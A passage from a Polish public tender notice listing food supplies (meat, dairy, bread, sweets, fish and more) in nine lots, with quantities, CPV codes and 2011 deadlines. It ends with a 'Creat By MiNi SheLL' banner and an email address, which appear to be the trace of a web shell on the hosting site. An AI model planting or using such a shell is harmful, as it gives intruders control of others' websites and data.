50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Tabela B*  MIĘSO I PRZETWOR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kości od schabu kg 350 Ogonówka wieprzowa wędzona  kg 150 Boczek wędzony wieprz. B k kg 80Parówka gruba wieprzowa 30%tł. Kg 400 Szynka wieprzowa wędzona got. Kg 150	 Mięso wieprzowe mielone drobne kg 260 Mielonka zapiekana wieprzowa	kg 100 Mięso gulaszowe wieprzowe kg 200 Filet drobiowy z kurczaka kg 170 Żeberka wieprzowe kg 170 Porcje rosołowe z kurczaka kg 150 Kiełbasa wieprzowa gruba kg 300 Udka z kurczaka kg 210	Karkówka b k wieprzowa kg 260 Kaszanka kg 100 Kurczak świeży patroszony do 2kg kg 150 Wątróbka wieprzowa kg  100	Parówka drobiowa cienka kg 150 Kotlet schabowy b k kg 100 Pasztet drobiowy kg 120 Smalec luz kg 150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TABELA C*  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fasolka szparagowa mrożona 2,5kg op.	szt. 50	Truskawki mrożone  2,5kg op.	 szt. 70	Mieszanka warzywna paski luz 2,5kg op. szt. 150 Brokuły mrożone 2,5kg op. szt. 50 Zupa pieczarkowa, 2,5kg op. szt. 100  Zupa kalafiorowa, 2,5kg op. szt. 160 Zupa jarzynowa, 2,5kg op. szt. 160	Kalafior, 2,5kg op. szt. 60 Pyzy drożdżowe op.9szt szt. 420 Groszek zielony, 2,5kg op. szt. 80 Marchew z groszkiem, 2,5kg op. szt. 80 Wiśnie drążone 2,5kg op. szt. 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Tabela D* PRZETWORY MĄCZNE, INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mąka pszenna 500  kg 300 Ryż długoziarnisty  kg 150 Kawa zbożowa (typu inka)150 g szt. 20 Kasza jęczmienna średnia luz kg 50 Kasza manna 1kg szt. 40 Kisiel różne smaki 40 g	szt. 300	Budyń różne smaki 40 g	szt. 300	Fasola czerwona konserwowa 450g op. szt. 40	Cukier biały kryształ, paczkowany 1kg	szt. 700	Syrop wieloowocowy, wysokosłodzony 1l szt. 50 Napoje różne smaki 0.20l kartonik szt. 1500	Krem do smarowania orzech.-czek. 200g szt. 180 Miód pszczeli nektarowy lipowy 0,5kg szt. 100Dżemy różne smaki 1,15 kg szt. 100 Kakao naturalne 200 g op. szt. 40Majonez dekoracyjny 0,7 kg op.  szt. 60 Musztarda sarepska 0,9 kg op.	szt. 20	Płatki kukurydziane 1 kg op. szt. 60 Groch połówki luz 5 kg op. szt. 40 Fasola sucha luz kg szt. 40 Koncentrat  pomidorowy 30% 0,9 l  szt. 100 Galaretka do ciast różne smaki  0,75g	szt.   240 Proszek do pieczenia 36g szt. 50 Drożdże piekarskie 100g szt. 70 Ketchup łagodny 500g szt.  20	Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 120  Liść laurowy 10g szt. 30 Cukier waniliowy 32g szt. 60 Cukier puder 0,5kg szt. 50 Kwasek cytrynowy spożywczy 20g szt. 40 Rodzynki 200g	szt. 10	Ananas puszka plastry, 0,58 kg	szt. 40	Brzoskwinia puszka połówki, 850dk szt. 50	Kukurydza konserwowa 400 ml	szt. 50	Groszek zielony puszka 400ml szt. 40 Przecier ogórkowy 0,5 kg op. szt. 50 Cynamon 20 g szt. 20 Ziele angielskie 100g szt. 50 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l  szt. 200 Szprot w pomidorach puszka  170g op. szt. 70	Paprykarz szczecinecki 135g op.	szt. 60	Pasztet drobiowy 131g op. szt.  100 Woda niegazowana 5l  szt. 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Tabela E* SŁODYCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukierki mieszane czekolad 2,5kg op. szt. 10 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display szt. 20 Wafle kakaowe  b czekolady (typu:Grześki) 30 szt op display szt. 30 Lizaki owocowe kulka - tuba 50szt op. szt. 8 Biszkopty 120g op. szt. 150	 Figurki czekoladowe - zajączki 80g szt. 270	 Jajka czekoladowe szt.	270 Wafle śmietankowe luz op. 3,2kg szt.8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tabela F* PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb baltonowski 0,6 kg krojony szt. 2000 Chleb razowy 0,5 kg ,,litewski krojonyszt. 300 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg krojony szt. 700	 Pączki	szt. 800	Bułka tarta 1 kg szt. 80 Babka okrągła średnia 0,5kg szt. 150 Drożdżówki szt. 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> TABELA G*  NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 12% słodka 0,5l  kartonik szt. 170 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 600 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 80 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie  szt. 2300 Mleko 2% karton 1 l op. szt. 1500 Krążek mix  typu Hochlland 140g trójkąty szt. 80 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50	Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 20 Jogurt smakowy 125g szt. 1500 Śmietanka kremowa 36% 0,5l szt. 30 Margaryna zwykła 250g  szt. 530 Masło śmietankowe 200g op. zaw. 86%tł. szt. 2200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> TABELA H*  MAKARONY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Majeranek 0,30kg op. szt. 20 Delikat do mięs i innych potraw 700g op. szt. 5 Delikat do drobiu 600g op. szt. 3Przyprawa szefa kuchni 5kg op. szt. 7 Makaron kokardki, 100% pszenicy Durum 5kg op. szt. 50 Makaron nitki 100% pszenicy Durum 5kg op. szt. 6 Makaron rurki 100% pszenicy Durum 5kg op. szt.  20 Makaron koła 100% pszenicy Durum 5kg op. szt. 20 Makaron łazanki 100% pszenicy Durum 3kg op.	szt. 12 Makaron świderki 100% pszenicy Durum 5kg op. szt. 10 Koncentrat pomarańczowy 5l szt.Herbata granulowana 100g op.	szt. 140	Papryka słodka syp. 0,5kg szt. 2	Pieprz mielony 0,5 kg	szt. 4 Przyprawa w płynie 1l szt. 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Tabela  I*  RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby mrożone filet z Pangi kg op. Kg 140 Hamburgery rybne kg 140 Ryby wiadro płaty śledziowe ocet kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com